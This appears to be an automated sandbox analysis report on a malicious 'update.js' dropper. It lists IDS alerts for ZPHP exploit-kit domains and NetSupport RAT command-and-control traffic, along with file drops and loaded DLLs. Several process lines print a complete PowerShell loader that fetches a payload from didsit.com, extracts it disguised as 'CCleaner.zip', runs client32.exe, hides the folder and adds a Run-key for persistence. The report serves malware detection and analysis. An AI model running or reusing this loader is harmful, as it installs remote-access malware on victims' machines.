                      2024-08-08T22:34:20.655944+0200   2055001  1         51062        53                UDP       Exploit Kit Activity Detected
                      2024-08-08T22:35:55.311482+0200   2055002  1         49708        443               TCP       Exploit Kit Activity Detected
                      2024-08-08T22:34:14.581870+0200   2827745  1         49705        443               TCP       Malware Command and Control Activity Detected

                      AV Detection

                      Source: http://didsit.com/data.php?7211Avira URL Cloud: Label: malware
                      Source: C:\Users\user\AppData\Roaming\RYMB15\HTCTL32.DLLReversingLabs: Detection: 13%
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeReversingLabs: Detection: 26%
                      Source: C:\Users\user\AppData\Roaming\RYMB15\remcmdstub.exeReversingLabs: Detection: 23%
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\RYMB15\msvcr100.dll
                      Source: unknownHTTPS traffic detected: 149.255.36.73:443 -> 192.168.2.16:49701 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.255.36.73:443 -> 192.168.2.16:49708 version: TLS 1.2

                      Software Vulnerabilities

                      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                      Networking

                      Source: C:\Windows\System32\wscript.exeNetwork Connect: 149.255.36.73 443
                      Source: global trafficHTTP traffic detected: GET /data.php?7211 HTTP/1.1Host: didsit.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.181.159.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.181.159.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.181.159.28
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /data.php?7211 HTTP/1.1Host: didsit.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficDNS traffic detected: DNS query: alphawatchrmf.com
                      Source: global trafficDNS traffic detected: DNS query: didsit.com
                      Source: global trafficDNS traffic detected: DNS query: geo.netsupportsoftware.com
                      Source: unknownHTTP traffic detected: POST http://5.181.159.28/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 5.181.159.28Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:
                      Source: Network trafficSuricata IDS: 2055001 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in DNS Lookup (alphawatchrmf .com) : 192.168.2.16:51062 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2055002 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in TLS SNI (alphawatchrmf .com) : 192.168.2.16:49701 -> 149.255.36.73:443
                      Source: Network trafficSuricata IDS: 2054858 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in DNS Lookup (didsit .com) : 192.168.2.16:54365 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.16:49705 -> 5.181.159.28:443
                      Source: Network trafficSuricata IDS: 2055002 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in TLS SNI (alphawatchrmf .com) : 192.168.2.16:49708 -> 149.255.36.73:443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                      Source: unknownHTTPS traffic detected: 149.255.36.73:443 -> 192.168.2.16:49701 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.255.36.73:443 -> 192.168.2.16:49708 version: TLS 1.2
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\RYMB15\PCICL32.DLL, type: DROPPED
                      Source: Yara matchFile source: 0000000D.00000002.2485075495.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY

                      System Summary

                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\RYMB15\pcicapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\RYMB15\HTCTL32.DLL
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\RYMB15\client32.exe
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\RYMB15\msvcr100.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\RYMB15\PCICL32.DLL
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\RYMB15\PCICHEK.DLL
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\RYMB15\remcmdstub.exe
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\RYMB15\TCCTL32.DLL
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: Server XML HTTP 6.0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{88d96a0b-f192-11d4-a65f-0040963251e5}
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Path $RNGB -ItemType Directory };$p=Join-Path $RNGB 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$RWPJKWOD);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RNGB)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RNGB 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $RNGB -Force; $fd.attributes='Hidden';$s=$RNGB+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BCYLGMFSMV';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Path $RNGB -ItemType Directory };$p=Join-Path $RNGB 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$RWPJKWOD);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RNGB)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RNGB 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $RNGB -Force; $fd.attributes='Hidden';$s=$RNGB+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BCYLGMFSMV';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeProcess token adjusted: Security
                      Source: update.jsInitial sample: Strings found which are bigger than 50
                      Source: classification engineClassification label: mal100.troj.expl.evad.winJS@8/26@3/66
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\RYMB15
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6692:120:WilError_03
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wrxzavvq.rcd.ps1
                      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Path $RNGB -ItemType Directory };$p=Join-Path $RNGB 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$RWPJKWOD);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RNGB)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RNGB 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $RNGB -Force; $fd.attributes='Hidden';$s=$RNGB+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BCYLGMFSMV';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\RYMB15\client32.exe "C:\Users\user\AppData\Roaming\RYMB15\client32.exe"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Path $RNGB -ItemType Directory };$p=Join-Path $RNGB 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$RWPJKWOD);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RNGB)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RNGB 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $RNGB -Force; $fd.attributes='Hidden';$s=$RNGB+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BCYLGMFSMV';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\RYMB15\client32.exe "C:\Users\user\AppData\Roaming\RYMB15\client32.exe"
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\update.js"
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: msxml6.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: winhttpcom.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: webio.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: pcicl32.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: pcichek.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: pcicapi.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: samcli.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe | Section loaded: dbghelp.dll
